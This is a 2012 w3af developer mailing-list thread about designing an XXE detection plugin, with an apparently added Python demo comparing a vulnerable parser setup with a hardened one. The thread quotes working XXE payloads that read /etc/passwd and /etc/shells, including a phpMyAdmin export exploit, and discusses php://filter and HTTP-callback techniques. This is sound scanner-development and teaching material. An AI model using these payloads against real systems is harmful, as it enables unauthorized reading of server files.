Evgeny,

On Tue, Aug 28, 2012 at 9:39 AM, Evgeny Tolmachev <etolmac...@ptsecurity.ru> wrote:
> Andres,
>
>> I think I understand what you're proposing here, but just to make things
>> clear: You want to include the http protocol in the XXE plugin in order to,
>> by starting an HTTP server on the box running w3af, be able to verify if the
>> target web application connects to it after sending the request?
>
> I have assumed 2 goals:
> 1) check - is it possible to make a remote connection (like in the LFI/RFI case) -
> as additional info
> 2) one of the ways to detect the existence of XXE, avoiding parsing output. But
> yes, it assumes a working HTTP server.

Great, love both ideas,

>> Once again to make things clear, you want us to use base64 php wrappers to
>> avoid the contents of the file being read breaking the XML output and thus
>> breaking detection/exploitation?
>
> Note: Using base64 wrapper could be a good idea, but we also need to take
> care of all the other programming languages that don't support this.
>
> 2 goals too :)
> 1) Avoiding breaking some elements by output checking, etc. Ok,
> 2) It makes it possible to use the current script location (for ex, upload_xml.php)
> right php://filter/read=....../resourse=upload_xml.php ,
> avoiding the full path to some "marker-file" (which can be non-existing or have
> limited access rights, or depend on the operating system, etc.).
> I think that it could slightly increase the possibility of detecting the vulnerability

Not sure if I follow you here, what's the difference between:

    file:upload_xml.php (please note that I'm not putting 3 /)

, and

    php://filter/read=.../resourse=upload_xml.php

The file protocol should be able to specify relative locations, correct? After
finishing this paragraph I tested it with Python and it seems to work:

>>> import urllib2
>>> urllib2.urlopen('file:///etc/passwd').readlines()[0]
'root:x:0:0:root:/root:/bin/bash\n'
>>> urllib2.urlopen('file:w3af_console').readlines()[0]   # file was in the same directory
'#!/usr/bin/env python\n'
>>>

But please note that it doesn't work with "file://"

>>> urllib2.urlopen('file://w3af_console').readlines()[0]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
    ...
urllib2.URLError: <urlopen error [Errno 2] No such file or directory: ''>

Regards,

>
>
> -----Original Message-----
> From: Andres Riancho [mailto:andres.rian...@gmail.com]
> Sent: Tuesday, August 28, 2012 4:10 PM
> To: Evgeny Tolmachev
> Cc: w3af-us...@lists.sourceforge.net; w3af-develop@lists.sourceforge.net;
> Carlos Pantelides; Achim Hoffmann; Taras P. Ivashchenko
> Subject: Re: [W3af-develop] Xml eXternal Entity
>
> Evgeny,
>
> On Tue, Aug 28, 2012 at 3:22 AM, Evgeny Tolmachev <etolmac...@ptsecurity.ru>
> wrote:
>> Hi, list.
>>
>> The latest case I had was XXE in PHPMyAdmin, which allows reading
>> files after export with a specially crafted *.xml file, and the exploit looked like
>> this:
>>
>> <?xml version="1.0" encoding="utf-8"?>
>> <!DOCTYPE ficheiro [
>> <!ENTITY xxe SYSTEM "file:///etc/shells" > ]>
>> <pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">
>> <pma:structure_schemas>
>> <pma:database name="test" collation="utf8_general_ci" charset="utf8">
>> <pma:table name="test_tbl">
>> CREATE TABLE `test_tbl` (`file` varchar(20000) NOT NULL);
>> </pma:table>
>> </pma:database>
>> </pma:structure_schemas>
>> <database name="test">
>> <table name="test_tbl">
>> <column name="file">&xxe;</column>
>> </table>
>> </database>
>> </pma_xml_export>
>
> Hmm, that looks complex/impossible to detect with a web scanner, thanks for
> showing us more examples of this vulnerability!
>
>>
>> I think that it is a totally non-obvious thing to get detection of such
>> things implemented in audit plugins, due to the logic of outputting the result
>> in a table.
>
> Yep!
>
>> Andres, you wrote:
>>> So our audit plugin should send the xml with the external entity as the
>>> post-data to all URLs?
>> I think that this way can be used only in a small number of cases where the
>> content of files is echoed right on the same page which processed the *.xml.
>> Also, I think that there have to be at least 2 checks - the first one for
>> reading a local file and another one for trying to use some protocols - http,
>> for example, instead of file:///.
>
> I think I understand what you're proposing here, but just to make things
> clear: You want to include the http protocol in the XXE plugin in order to,
> by starting an HTTP server on the box running w3af, be able to verify if the
> target web application connects to it after sending the request?
>
>> Besides this, I think that first (before checking direct file:///) we
>> must check the possibility of reading a file using the php:// wrapper and base64
>> conversion.
>
> Once again to make things clear, you want us to use base64 php wrappers to
> avoid the contents of the file being read breaking the XML output and thus
> breaking detection/exploitation?
>
> Note: Using base64 wrapper could be a good idea, but we also need to take
> care of all the other programming languages that don't support this.
>
>> So I think that the checking process must be implemented, as a minimum, not only for
>> file:///.
>>
>>
>> -----Original Message-----
>> From: Andres Riancho [mailto:andres.rian...@gmail.com]
>> Sent: Tuesday, August 28, 2012 12:14 AM
>> To: w3af-us...@lists.sourceforge.net;
>> w3af-develop@lists.sourceforge.net; Carlos Pantelides; Achim Hoffmann;
>> Taras P. Ivashchenko
>> Subject: [W3af-develop] Xml eXternal Entity
>>
>> Lists,
>>
>> I've been playing around with the idea of writing an XXE [0] detection
>> plugin for w3af all evening, but I can't really decide if it is worth it.
>>
>> Have you guys seen these types of vulnerabilities in the wild? If so,
>> how? Most of the public vulnerabilities I see are exploited in this form:
>>
>> """
>> POST /xmlrpc_server.php HTTP/1.1
>> Host: $host
>>
>> <?xml version="1.0"?>
>> <!DOCTYPE foo [
>> <!ELEMENT methodName ANY >
>> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
>> <methodCall>
>> <methodName>&xxe;</methodName>
>> </methodCall>
>> """
>>
>> Which basically means that the vulnerable source code looks like:
>>
>> """
>> <?
>> ...
>> $xml = simplexml_load_file("php://input");
>> ...
>> echo $some_part_of_the_xml;
>> ?>
>> """
>>
>> So our audit plugin should send the xml with the external entity as the
>> post-data to all URLs? I can't find a realistic example where it would make
>> sense to send the custom-xml to one of these:
>>
>> - Query string parameter: http://host/index.aspx?id=<?xml...>
>> - HTML Form with url-encoding: http://host/index.aspx with post-data
>>   name=<?xml...>&lastname=doe&age=32
>> - HTML Form with file input, where the uploaded file contains the XML
>>   (could... maybe work in some cases... but most likely the /etc/passwd file
>>   won't be echoed back in the response).
>>
>> What do you think? Ideas?
>>
>> [0] https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OWASP-DV-008%29
>>
>> Regards,
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/ Web Application Attack and
>> Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond.
>> Discussions will include endpoint security, mobile security and the
>> latest in malware threats.
>> http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> W3af-develop mailing list
>> W3af-develop@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/w3af-develop
>
>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit
> Framework
> Twitter: @w3af
> GPG: 0x93C344F3

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
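The xmlrpc_server.php shape discussed in the thread (a SYSTEM entity referenced inside <methodName> and echoed back), reproduced in Python as an added example that is not w3af code or anything posted in the thread: the same payload is parsed once by a parser that follows external general entities and once by the hardened configuration, showing that only the former returns the file contents. The marker file and its contents are constructed, and `parse_untrusted` and `demo` are hypothetical helper names.

```python
import io
import pathlib
import tempfile
import xml.sax
import xml.sax.handler


class TextCollector(xml.sax.handler.ContentHandler):
    """Collect the character data inside one named element."""

    def __init__(self, wanted):
        super().__init__()
        self.wanted, self.inside, self.chunks = wanted, False, []

    def startElement(self, name, attrs):
        self.inside = self.inside or name == self.wanted

    def endElement(self, name):
        if name == self.wanted:
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.chunks.append(content)


def parse_untrusted(xml_bytes, resolve_external):
    """Return the <methodName> text; resolve_external=True mirrors a parser
    that follows SYSTEM entities (the vulnerable case), False the hardened one."""
    handler = TextCollector("methodName")
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def demo():
    """Return (vulnerable_output, hardened_output) for one XXE payload."""
    # Constructed stand-in for a sensitive local file such as /etc/passwd.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("CONSTRUCTED-SECRET-MARKER")
    payload = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        '<methodCall><methodName>&xxe;</methodName></methodCall>'
        % pathlib.Path(fh.name).as_uri()
    ).encode()
    return parse_untrusted(payload, True), parse_untrusted(payload, False)
```

With external general entities disabled (the default in current Python), the entity reference expands to nothing, which is why a scanner that only looks for the marker in the response sees no difference between a hardened parser and an application that never echoes the element.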